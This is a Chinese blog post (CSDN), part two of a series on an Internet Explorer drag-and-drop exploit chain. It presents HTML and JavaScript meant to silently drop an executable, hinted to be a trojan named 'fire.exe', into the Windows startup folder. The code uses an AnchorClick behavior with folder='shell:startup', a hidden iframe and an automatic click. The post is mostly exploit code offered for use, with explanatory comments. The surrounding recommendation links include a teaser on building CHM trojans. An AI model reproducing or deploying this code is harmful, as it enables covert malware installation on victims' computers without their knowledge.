IE拖放漏洞详解二

最新推荐文章于 2024-09-04 11:00:19 发布
最新推荐文章于 2024-09-04 11:00:19 发布
阅读量1.7k 收藏
点赞数
分类专栏: Security 文章标签: ie iframe shell javascript behavior button
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AchillesA/article/details/181481
版权

第二个要利用的漏洞就是在IE中显示一个本地的目录,当然这里的显示不是说要让人看见,而是要让机器能看见。并且当下面a元素的folder属性为目录或是shell:startup时以及a元素支持anchorclick行为时,就可以在网页的ifram中显示目录并且可以将远程文件在没有任何提示的情况下写到这个目录中,为了不要让人看见他的目录显示在了网页中,我们还有把iframe放在div中,将其属性设为HIDDEN
+-----------------------------------iframe.html Code---------------------------+
<html>
<head>
<style>
a {
    behavior:url(#default#AnchorClick);
}
<!--关键,定义a元素的行为,让动作的执行不会有任何的提示-->
</style>
</head>
<body >

<img id="dyn" dynsrc="fire.exe" >
<!--这里这个fire.exe你应该知道是什么吧-->
<div>
    <iframe name="clientframe" id="clientframe" style="position:absolute;width:200px;height:200px;"></iframe>
</div>

<a folder="shell:startup"  id="clientcall" target="clientframe"></a>
<!--shell:startup就是启动目录,你可以在浏览器的窗口输入shell:startup看看-->
<script language="JavaScript" type="text/javascript">
document.getElementById("clientcall").click()
<!--关键字 getElementById,获取对 ID 标签属性为指定值的第一个对象的引用-->
#######################    举例   #########################################
<button οnclick='alert(document.getElementById("a").outerHTML)'>访问a</button>
<img name=a>
<img name=a src='c'>
##########################################################################
</script>
</body>
</html>


+----------------------------------end--------------------------------------+

AchillesA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HTML5详解
kangzinian的博客
07-09 280
1. HTML5版本介绍 HTML 2.0–1951年11月作为RFC1866发布,在RFC2845与2000年6月发布之后被宣布已经过时 HTML 3.2–1997年1月14日,W3C推荐标准 HTML 4.0–1997年12月18日,W3C推荐标准 HTML 4.01(微小改进) – 1999年12月24日,W3C推荐标准 HTML 5 --2014年10月28日,W3C推荐标准 设计HTML 5最主要的目的是为了在移动设备上支持多媒体。例如: video标签和audio及canvas标记 新特性:
Qt 拖放功能详解详细示例代码
04-18
2. **处理拖动开始**:在需要开始拖动的地方(通常在鼠标按下事件中),创建一个QDrag对象,并设置其MIME类型和数据: ```cpp void MySourceWidget::mousePressEvent(QMouseEvent *event) { if (event->button()...
IE拖放漏洞详解
Anonymous
11-14 2107
漏洞的利用主要是综合了ie的三个漏洞,第一个就是当img元素的透明滤镜为全透明的时候还可以响应事件,代码如下:(不是原创,加了注释方便理解)+-----------------------------------------------------------Code-1---------------------------------------------------------------
界面劫持之拖放劫持
白帽黑客佳哥的博客
06-19 767
在2010的Black Hat Europe大会上,Paul Stone提出了点击劫持的技术演进版本:拖放劫持。由于用户需要用鼠标拖放完成的操作越来越多(如复制粘贴、小游戏等等),拖放劫持大大提高了点击劫持的攻击范围,将劫持模式从单纯的鼠标点击拓展到了鼠标拖放行为。
xp系统服务详解
Liang4的专栏
10-13 846
请使用ctrl+F查找~ 1、Alerter 服务名称:Alerter 进程名称:services.exe 功能说明:这个服务是当系统发生故障时向管理员发送警报,或向用户发送出错信息。 除非你的电脑处在局域网中,而且配有网络管理员,一般情况下可以设置为“手动”或
HTML5中的拖放实现详解
09-27
拖放是一种常见的特性,即抓取对象以后拖到另一个位置,在 HTML5 中,拖放是标准的组成部分。在HTML5中用户可以使用鼠标选择一个可拖动元素,将元素拖动到一个可放置元素,并通过释放鼠标按钮放到这些元素。在拖动...
易语言拖放对象组件应用详解
08-26
3. **事件处理**:在易语言中,拖放操作涉及到几个关键事件,包括“开始拖放”、“拖放中”和“结束拖放”。开发者需要编写相应的事件处理程序,以响应这些事件,比如处理拖放数据的接收、确认数据类型、以及更新...
CHM木马(简单高效)
Anonymous
11-13 4811
这是现在网上比较普遍的一种中马方法,主要就是利用CHM可以将可执行文件包含其中,并且利用简单的html就可以让程序自动运行,制作方法非常简单,主要就是木马的选择,由于不知道对方机器上是否用了杀毒软件,也不知道是什么杀毒软件,所以要用绝对不被查杀的木马或是后门程序(自己加壳的方法也不错‘最好是一些不太知名的加壳软件),另外还有用到CHM制作工具,推荐QuickCHM。将木马和html文件放在同一文件
DOD模型
Anonymous
11-12 2617
DOD( Department of Defense国防部)模型:结构基本上可以看成是OSI的浓缩版:+---------------------------------DOD--------------------+1.Process/Application-------------------->应用层----------------------------->Application/Pres
JPG漏洞
Anonymous
11-13 2555
这是现在网上常被利用的漏洞,国内的几大杀毒厂商的网站都有介绍。由于网上相应的Exploit比较多,所以利用该漏洞门槛降低,只要你会用写好的工具就行了。该漏洞全称:“Microsoft Windows GDI+ JPG 解析组件缓冲区溢出漏洞”,(Microsoft Windows图形设备接口(GDI+)是为用户提供在屏幕和打印机上显示信息的API,GDI+(Gdiplus.dll)在处理畸形JPE
shell脚本前置基础
abandon的博客
09-02 874
可以通过内部命令export将指定的变量导出为全局变量,使用户定义的变量在所有的子Shel!这意味着全局变量在整个程序或脚本的不同部分都是可见和可访问的,而不仅限于特定的函数、方法或代码块。环境变量的全局配置文件为/etc/profile,在此文件中定义的变量作用于所有用户。/bin/bash:表示此行以下的代码语句是通过/bin/bash程序来解释执行。默认情况下,新定义的变量只在当前的Shell环境中有效,因此称为局部变量。以“#”开头的语句表示为注释信息,被注释的语句在运行脚本时不会被执行。
shell 脚本自定义函数 与参数传递
09-03 343
shell脚本语言也是可以自定义函数的, shell里面的函数定义形式和js有点类似(参数除外), 他的定义方式如下:shell中的函数中的参数传递和接收 和使用一个独立的shell脚本是一样的. 直接在要使用的地方 写上自定义的函数名即可, 这个和使用linux里面的命令是一样的. 如: xxxFn参数传递和使用独立shell脚本和命令行工具的参数传递是一样的. 直接在函数名后面以空格隔开后传递即可, 注意参数最好用双引号引起来如: xxxFn "var1" "var2"自定义函数的参数接收与s
Shell编程基础知识
weixin_65477256的博客
09-03 693
说明执行该 Shell 脚本的解释器: 注释定义变量名=值修改值变量名=新值取值$变量名$#: 参数个数$*: 所有参数: 第一个、第个参数: 上一个命令的返回状态$0: 脚本名称$$: 当前Shell的进程ID语法1函数名() {执行语句 }语法2function 函数名() {执行语句 }
重置vCenter Server的root密码
最新发布
XMYX-0
09-04 537
vcenter server重置root密码
shell编程中的do有什么用
2301_77836489的博客
09-03 316
shell编程中的do有什么用
Shell 编程之免交互
2401_83958584的博客
08-29 377
Here Document 也支持使用变量,如果标记之间有变量被使用,会先替换变量值。如 果想要将一些内容写入文件,除了常规的方法外,也可以使用 Here Document。命令接收用户的输入值时会有交互过程,尤其是在脚本执行过程中遇到read 命令,脚本会停下来等待用户输入值后才会继续。多分支用于复杂的用户交互,一般情况下输出内容可能有多个,根据不同的输出内容, 分别向标准输入发送不同的内容。可以 将一些简单的交互任务的交互过程去除掉,尤其是在编写脚本的过程中。用户设置密码,为避免重复交互,可使用。
ssh安装
2301_80414602的博客
09-03 1082
您可以通过检查 SSH 版本来检查您的 Linux 机器中是否安装了 SSH 服务。要查找您的 IP 地址,您可以使用基本的 net-tool 命令来获取您的互联网协议详细信息。要获得有关 Linux 上 SSH 服务的更多帮助,您可以使用终端 shell 中的默认帮助功能。在 Linux 计算机中安装 SSH 服务后,您现在可以检查系统状态、启用 SSH 服务并开始使用安全 shell 系统。让您知道您的用户名和静态 IP 地址,您现在可以构建从 Linux 计算机到另一台设备的安全 shell 网络。
春秋云镜(OpenSSH)·CVE-2023-51385
m0_61155226的博客
08-30 219
靶标介绍: OpenSSH 是使用 SSH 协议进行远程登录的连接工具。在OpenSSH 9.6版本之前的ssh中,如果用户名或主机名中含有shell元字符(如 | ' "等),并且ssh_config中ProxyCommand、LocalCommand指令或"match exec"谓词通过%u、%h或类似的扩展标记引用用户或主机名时,可能会发生命令注入。Git未禁止用户或主机名中的shell元字符,存储库可能包含一个带有shell元字符的子模块用户或主机名,可能导致产生命令注入漏洞
PyQt5拖放事件详解与实战教程
在PyQt5中,"PyQt5每天必学之拖放事件"是一个实用的主题,它涵盖了如何在Qt应用中实现直观的用户交互。拖放操作是图形用户界面(GUI)中的核心功能之一,允许用户通过鼠标或触控设备移动、复制或交换数据或对象。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值